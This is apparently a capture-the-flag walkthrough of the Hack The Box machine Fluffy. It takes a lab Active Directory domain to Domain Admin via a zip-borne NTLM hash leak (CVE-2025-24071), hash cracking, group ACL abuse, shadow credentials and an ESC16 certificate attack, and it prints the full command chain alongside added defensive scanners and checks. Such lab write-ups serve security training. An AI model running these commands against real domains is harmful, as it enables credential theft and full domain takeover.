HTB - Fluffy

Description
This machine follows an assumed-breach scenario, starting with a user who has read/write access to an SMB share. Leveraging a recent Windows vulnerability, the attacker uploads a crafted .zip file containing a .library-ms file pointing to an attacker-controlled address. When any user extracts the archive, the system initiates an NTLMv2 authentication attempt to the attacker-controlled listener. Capturing the hash via smbserver or responder, the attacker cracks it to obtain credentials for another domain user. This user has GenericAll over a group, and the group has GenericWrite over three domain users, allowing takeover through a shadow credentials attack. One compromised user has WinRM access to the target system, and another is a member of the Cert Publishers group. By enumerating certificate templates, the attacker identifies and exploits an ESC16 misconfiguration to escalate privileges and obtain Domain Admin access.
Enumeration
As is common in real-life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!
Nmap Scan
I will start with a normal Nmap scan, but first I export the machine IP, username, password and domain to variables for easy use.
export target=10.10.11.69 ; export user=j.fleischman; export password='J0elTHEM4n1990!'; export domain=fluffy.htb
Nmap Scan
mkdir Nmap; nmap -p- --min-rate 10000 $target -Pn -oN Nmap/allports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49693/tcp open unknown
49709/tcp open unknown
49716/tcp open unknown
Then, put the open ports into a ports variable and run the Nmap script and version scan
export ports="$(cat Nmap/allports | grep '^[0-9]' | cut -d/ -f1 | tr "\n" "," | sed 's/,$//g')"
nmap -p"$ports" $target -Pn -sC -sV -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-10 17:11:16Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Summary
* Open ports: 53,88,139,389,445,464,593,636,3268,3269,5985,9389
* Services: DNS, KERBEROS, LDAP, LDAPS, SMB, RPC, winRM
* Important notes: Domain: fluffy.htb - DNS:DC01.fluffy.htb
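As an added example that is not part of the original writeup, the following Python turns nmap -oN output like the scan above into the same summary (open ports, service roles, domain and DC hostname) and builds the /etc/hosts line used in the next step. The scan excerpt embedded in it is constructed from the output above; the service-to-role mapping and the handling of the trailing "0." that nmap prints after the LDAP domain are my assumptions.

```python
import re
from typing import Dict, List, Optional

# Constructed excerpt in the layout of the nmap -oN script scan above (a subset
# of the real output, used here as sample input).
SAMPLE_SCAN = """\
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-10 17:11:16Z)
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open  mc-nmf        .NET Message Framing
"""

PORT_LINE = re.compile(r"^(\d+)/(?:tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
SAN_DNS = re.compile(r"DNS:([A-Za-z0-9.-]+)")
LDAP_DOMAIN = re.compile(r"Domain: ([^,]+),")

# nmap service names -> the role names used in the Summary above (assumed mapping).
SERVICE_ROLE = {
    "domain": "DNS", "kerberos-sec": "KERBEROS", "kpasswd5": "KERBEROS",
    "ldap": "LDAP", "ssl/ldap": "LDAPS", "netbios-ssn": "SMB",
    "microsoft-ds": "SMB", "ncacn_http": "RPC", "mc-nmf": "ADWS",
}
PORT_ROLE = {5985: "winRM", 5986: "winRM"}  # nmap only reports "http" on these


def summarize(scan_text: str) -> Dict[str, object]:
    """Turn nmap -oN text into the open-port / service / domain summary."""
    ports: List[int] = []
    services: List[str] = []
    hostnames: List[str] = []
    domain: Optional[str] = None
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port_s, state, service, version = m.groups()
            if state != "open":
                continue
            port = int(port_s)
            ports.append(port)
            service = service.rstrip("?")  # "microsoft-ds?" means an unconfirmed guess
            role = PORT_ROLE.get(port) or SERVICE_ROLE.get(service, service.upper())
            if role not in services:
                services.append(role)
            dm = LDAP_DOMAIN.search(version or "")
            if dm and domain is None:
                d = dm.group(1)
                # the ldap script shows the DNS-encoded name with a trailing "0."
                domain = d[:-2] if d.endswith("0.") else d
            continue
        # script output lines (| ...): pick hostnames out of the certificate SAN
        for host in SAN_DNS.findall(line):
            if host not in hostnames:
                hostnames.append(host)
    return {"ports": ports, "services": services, "domain": domain, "hostnames": hostnames}


def hosts_entry(ip: str, summary: Dict[str, object]) -> str:
    """Build the /etc/hosts line (short name, FQDN, domain) the writeup adds."""
    names: List[str] = []
    for fqdn in summary["hostnames"]:
        fqdn = fqdn.lower()
        names.extend([fqdn.split(".")[0], fqdn])
    if summary["domain"]:
        names.append(summary["domain"])
    return ip + " " + " ".join(names)


if __name__ == "__main__":
    s = summarize(SAMPLE_SCAN)
    print("Open ports:", ",".join(map(str, s["ports"])))
    print("Services:", ", ".join(s["services"]))
    print("Domain:", s["domain"], "- DC:", ", ".join(s["hostnames"]))
    print(hosts_entry("10.10.11.69", s))
```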
I always update /etc/hosts before I attack the domain to avoid any tooling issues.
echo "$target dc01 dc01.fluffy.htb fluffy.htb" | sudo tee -a /etc/hosts
10.10.11.69 dc01 dc01.fluffy.htb fluffy.htb
I started by enumerating SMB, looking for accessible shares, and found that I had READ/WRITE permission on the IT share
nxc smb $target -u $user -p $password --shares

I connected to the share and found something odd: there were archive files, and the data they contained had been extracted into the same location.
impacket-smbclient "$domain/$user:$password"@"$target"

There was also a .pdf file, which I downloaded and opened locally:

The PDF showed that several vulnerabilities affect the Windows system and that urgent updates are needed to patch them. The same PDF contains a table with the CVE IDs and the severity of the vulnerabilities

Foothold
CVE-2025-24071 is a recent Windows vulnerability that leaks NTLM hashes when an archive is extracted inside a Windows environment. Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a .rar (or, as here, .zip) archive, leading to NTLM hash disclosure. The user does not need to open or execute the file; simply extracting it is enough to trigger the leak.
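A defender-side counterpart to the vulnerability described above, added here as an example and not taken from the page or the PoC repository: a scanner that a mail gateway or a share-monitoring job could run over incoming archives. It flags .library-ms entries (including inside nested zips) and UNC references to remote hosts in text entries, which is the signal that matters for this class of NTLM leak. The sample archive is constructed inside the script; the .library-ms entry holds placeholder bytes rather than a real library file, and the size and depth limits are my choices.

```python
import io
import re
import zipfile
from typing import List, Tuple

# Entry types Explorer resolves on extraction; the CVE above concerns .library-ms.
RISKY_SUFFIXES = (".library-ms",)
# \\host\share references in an entry's bytes, in ASCII or UTF-16LE text.
UNC_ASCII = re.compile(rb"\\\\([A-Za-z0-9._-]+)\\")
UNC_UTF16 = re.compile(rb"\\\x00\\\x00((?:[A-Za-z0-9._-]\x00)+)\\\x00")
MAX_DEPTH = 3                 # how far to descend into zip-in-zip (assumed limit)
MAX_ENTRY_BYTES = 5_000_000   # skip content checks on very large entries (assumed limit)

Finding = Tuple[str, str]     # (entry path, reason)


def scan_archive(data: bytes, prefix: str = "", depth: int = 0) -> List[Finding]:
    """Return findings for an in-memory zip archive; nested zips are recursed."""
    findings: List[Finding] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            lower = path.lower()
            if lower.endswith(RISKY_SUFFIXES):
                findings.append((path, "library-ms entry: Explorer resolves its location on extraction"))
            if info.file_size > MAX_ENTRY_BYTES:
                continue
            content = zf.read(info)
            if lower.endswith(".zip"):
                # recurse instead of pattern-scanning the binary zip bytes
                if depth < MAX_DEPTH:
                    findings.extend(scan_archive(content, path + "!/", depth + 1))
                continue
            hosts = {h.decode("ascii") for h in UNC_ASCII.findall(content)}
            hosts |= {h.decode("utf-16-le") for h in UNC_UTF16.findall(content)}
            for host in sorted(hosts):
                findings.append((path, f"UNC reference to host {host}"))
    return findings


def verdict(findings: List[Finding]) -> str:
    """Gateway decision: anything flagged goes to quarantine for review."""
    return "quarantine" if findings else "allow"


def build_sample() -> bytes:
    """Constructed sample archive: an inner zip with a .library-ms placeholder
    (its bytes are a stand-in, not a real library file) plus an INI file whose
    UTF-16 text points at a UNC share on a documentation-range address."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("docs/report.library-ms", "<placeholder/>")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("settings.ini", "path=\\\\203.0.113.10\\files".encode("utf-16-le"))
        z.writestr("attachments.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    found = scan_archive(build_sample())
    for entry, reason in found:
        print(f"{entry}: {reason}")
    print("verdict:", verdict(found))
```

Nested zips are recursed rather than pattern-scanned, so their binary content does not produce false UNC hits; the UTF-16 pattern matters because most Windows-authored text files are not ASCII.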
I cloned the repo, ran the exploit, and uploaded the generated exploit file (exploit.zip) to the IT share.
git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
➜ CVE-2025-24071_PoC git:(main) python poc.py
Enter your file name: exploit.zip
Enter IP (EX: 192.168.1.162): 10.10.16.14
completed
ls
exploit.zip poc.py README.md
On another terminal, I opened smbserver to receive the NTLMv2 authentication
impacket-smbserver -smb2support shared $(pwd)

The hash was cracked successfully with hashcat (mode 5600, NetNTLMv2):
hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt
..snip..
P.AGILA::FLUFFY:aaaaaaaaaaaaaaaa:f29a0e18c93061c0af46ef5bb70b63e5:010100000000000000dd6793ebccdb013c7a2d2bd065bee600000000010010006c004f00620071004b00700056005100030010006c004f00620071004b00700056005100020010004a0061006300470061004b0050006800040010004a0061006300470061004b00500068000700080000dd6793ebccdb0106000400020000000800300030000000000000000100000000200000cbc3277eb791f42542be92295c13824afb1ef0001e7901d4f727bc0b8bbb43b60a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e003100360xxxxxxxxxxxxxxxxxxxxxxxxxxxxx:REDACTED
Session..........: hashcat
Status...........: Cracked
With the p.agila credentials (or j.fleischman's), I could collect LDAP data with bloodhound.py
bloodhound-python -u $user -p $password -ns $target -d $domain -c all --dns-timeout 120 --zip

Lateral movement
BloodHound showed the escalation path from p.agila to 3 domain users:
* ca_svc is a member of Cert Publishers
* ldap_svc
* winrm_svc can WinRM to the box

With GenericAll on Service Accounts, I can add any user to that group, inheriting its privileges. With GenericWrite, I could perform the following attacks:
* targetedKerberoast (assign an SPN to a user and obtain a hash to crack offline)
* Shadow Credentials (add Key Credentials for a user)
I prefer to perform the Shadow Credentials attack because it is the more OPSEC-friendly option
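To show how BloodHound arrives at a path like this, here is an added example (not code from the writeup or from BloodHound) that runs a breadth-first search over takeover edges in a constructed edge list modelled on the relationships listed above. who_can_reach and cut_edges give the defender's view: which principals can end up controlling a target, and which ACEs must be removed to close the path. Edge names follow BloodHound's labels; which edges count as traversable is my assumption.

```python
from collections import deque
from typing import Dict, List, Optional, Set, Tuple

Edge = Tuple[str, str, str]  # (source, relationship, target)

# Constructed edge list modelled on what BloodHound reported for this box.
EDGES: List[Edge] = [
    ("p.agila", "GenericAll", "Service Accounts"),
    ("Service Accounts", "GenericWrite", "ca_svc"),
    ("Service Accounts", "GenericWrite", "ldap_svc"),
    ("Service Accounts", "GenericWrite", "winrm_svc"),
    ("ca_svc", "MemberOf", "Cert Publishers"),
    ("winrm_svc", "CanPSRemote", "DC01"),
]

# Relationships whose holder can act as the target, by abuse or plain membership
# (assumed set; BloodHound's full list is longer).
TRAVERSABLE = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner",
               "AddMember", "MemberOf", "CanPSRemote"}


def adjacency(edges: List[Edge]) -> Dict[str, List[Tuple[str, str]]]:
    """Outgoing traversable edges per node."""
    graph: Dict[str, List[Tuple[str, str]]] = {}
    for src, rel, dst in edges:
        if rel in TRAVERSABLE:
            graph.setdefault(src, []).append((rel, dst))
    return graph


def shortest_path(edges: List[Edge], start: str, goal: str) -> Optional[List[Edge]]:
    """BFS over takeover edges; returns the edge chain from start to goal, or None."""
    graph = adjacency(edges)
    parent: Dict[str, Optional[Tuple[str, str]]] = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            chain: List[Edge] = []
            while parent[node] is not None:
                src, rel = parent[node]
                chain.append((src, rel, node))
                node = src
            return chain[::-1]
        for rel, nxt in graph.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    return None


def who_can_reach(edges: List[Edge], goal: str) -> Set[str]:
    """Every principal with some path to goal: what an ACL review should list."""
    return {src for src, _, _ in edges if shortest_path(edges, src, goal) is not None}


def cut_edges(edges: List[Edge], start: str, goal: str) -> List[Edge]:
    """Edges on the shortest path whose removal alone disconnects start from goal."""
    path = shortest_path(edges, start, goal) or []
    return [e for e in path
            if shortest_path([x for x in edges if x != e], start, goal) is None]


if __name__ == "__main__":
    for src, rel, dst in shortest_path(EDGES, "p.agila", "DC01") or []:
        print(f"{src} -[{rel}]-> {dst}")
    print("can reach Cert Publishers:", sorted(who_can_reach(EDGES, "Cert Publishers")))
    print("ACEs to remove:", cut_edges(EDGES, "p.agila", "DC01"))
```

Removing the GenericAll ACE on Service Accounts is the single change that breaks both paths shown on the page; the cut_edges output lists it first because it is the first hop.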
Add myself to the Service Accounts group
bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p REDACTED add groupMember 'Service Accounts' p.agila
[+] p.agila added to Service Accounts
Add a shadow credential for winrm_svc
certipy shadow auto -u p.agila@fluffy.htb -p REDACTED -account winrm_svc

evil-winrm -i fluffy.htb -u winrm_svc -H 33bd09dcd697600edfxxxxxxxxxxx

User flag: 2eb60ea1cc7b27axxxxxxxxxxxxxxx
Privilege Escalation
There was another account in the Cert Publishers group, and BloodHound described its privileges

First, I looked for ADCS in the domain with nxc and found one CA named fluffy-DC01-CA
nxc ldap fluffy.htb -u p.agila -p REDACTED -M adcs
LDAP 10.10.11.69 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
LDAP 10.10.11.69 389 DC01 [+] fluffy.htb\p.agila:########
ADCS 10.10.11.69 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.69 389 DC01 Found PKI Enrollment Server: DC01.fluffy.htb
ADCS 10.10.11.69 389 DC01 Found CN: fluffy-DC01-CA
Second, I added a key credential to ca_svc and got its hash
certipy shadow auto -u p.agila@fluffy.htb -p REDACTED -account ca_svc

Then, I used the latest version of certipy to find templates vulnerable to ESC attacks
certipy find -u ca_svc@fluffy.htb -hashes REDACTED -enable -stdout -vulnerable

ESC16 describes a misconfiguration where the CA itself is globally configured to disable the inclusion of the szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2) security extension in all certificates it issues. This SID extension, introduced with the May 2022 security updates (KB5014754), is vital for "strong certificate mapping", enabling DCs to reliably map a certificate to a user or computer account's SID for authentication.
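An added check for this condition, not from Certipy or from the page: it parses the CA policy module's DisableExtensionList (as printed by certutil -getreg policy\DisableExtensionList on the CA host) for OID 1.3.6.1.4.1.311.25.2 and combines it with the DC's StrongCertificateBindingEnforcement value from KB5014754 to rate the exposure. The certutil output embedded below is a constructed sample in that layout (the CA name is the page's, the second OID is filler), and the risk ratings are my own wording.

```python
import re
from typing import Dict, List

SID_EXTENSION_OID = "1.3.6.1.4.1.311.25.2"  # szOID_NTDS_CA_SECURITY_EXT

# Constructed sample in the layout of `certutil -getreg policy\DisableExtensionList`
# run on the CA host. The registry path uses the page's CA name; the exact text
# around the entries is an assumption about certutil's output format.
SAMPLE_CERTUTIL = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\fluffy-DC01-CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy:

  DisableExtensionList REG_MULTI_SZ =
    0: 1.3.6.1.4.1.311.25.2
    1: 1.3.6.1.4.1.311.21.10

CertUtil: -getreg command completed successfully.
"""

# One "<index>: <oid>" line per REG_MULTI_SZ entry.
MULTI_SZ_ENTRY = re.compile(r"^\s*\d+:\s*([0-9][0-9.]*)\s*$", re.MULTILINE)

# KDC registry value StrongCertificateBindingEnforcement (KB5014754):
# 0 = disabled, 1 = compatibility (weak mappings allowed and logged as KDC
# Event ID 39), 2 = full enforcement (weak mappings rejected).
ENFORCEMENT_NAMES = {0: "Disabled", 1: "Compatibility", 2: "Full Enforcement"}


def disabled_extensions(certutil_output: str) -> List[str]:
    """OIDs the CA's policy module strips from every certificate it issues."""
    return MULTI_SZ_ENTRY.findall(certutil_output)


def assess_esc16(certutil_output: str, kdc_enforcement: int) -> Dict[str, object]:
    """Combine the CA-side setting with the DC-side enforcement mode."""
    disabled = disabled_extensions(certutil_output)
    sid_off = SID_EXTENSION_OID in disabled
    if not sid_off:
        risk = "low"
        why = "CA still embeds the SID extension in issued certificates"
    elif kdc_enforcement == 2:
        risk = "medium"
        why = ("CA omits the SID extension (ESC16), but DCs in Full Enforcement reject "
               "certificates without a strong mapping; fix the CA anyway")
    else:
        risk = "high"
        why = ("CA omits the SID extension (ESC16) and DCs accept weakly mapped "
               "certificates, so the UPN in the certificate decides who it maps to")
    return {
        "sid_extension_disabled": sid_off,
        "disabled_oids": disabled,
        "kdc_enforcement": ENFORCEMENT_NAMES.get(kdc_enforcement, "unknown"),
        "risk": risk,
        "reason": why,
    }


if __name__ == "__main__":
    for mode in (1, 2):
        result = assess_esc16(SAMPLE_CERTUTIL, mode)
        print(f"KDC {result['kdc_enforcement']}: {result['risk']} - {result['reason']}")
```

Remediation is to take the OID out of DisableExtensionList and restart the CA service so the SID extension is issued again; while DCs are in Compatibility mode, KDC Event ID 39 records every certificate that authenticated without a strong mapping, which is the event to hunt on for certificates like the one this section requests.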
I followed the Certipy wiki to perform the ESC16 attack; this is exactly the case in my situation here:

Change the victim account's UPN to match the target privileged account's sAMAccountName.
certipy account -u ca_svc -hashes REDACTED -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update
Request a Kerberos ticket and authenticate with it instead of NTLM, so that the updated UPN is carried in the ticket information
impacket-getTGT fluffy.htb/ca_svc -hashes REDACTED -dc-ip 10.10.11.69
export KRB5CCNAME=`pwd`/ca_svc.ccache
Request a certificate (which will automatically lack the SID security extension due to the CA's ESC16 configuration).
certipy req -k -dc-ip 10.10.11.69 -target dc01.fluffy.htb -ca 'fluffy-DC01-CA' -template 'User'

Revert the UPN change.
certipy account -u ca_svc -hashes REDACTED -dc-ip 10.10.11.69 -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Use the certificate to impersonate the target.
certipy auth -dc-ip 10.10.11.69 -pfx 'administrator.pfx' -username 'administrator' -domain fluffy.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Get the root flag
nxc smb fluffy.htb -u Administrator -H REDACTED -x 'type C:\Users\Administrator\Desktop\root.txt'
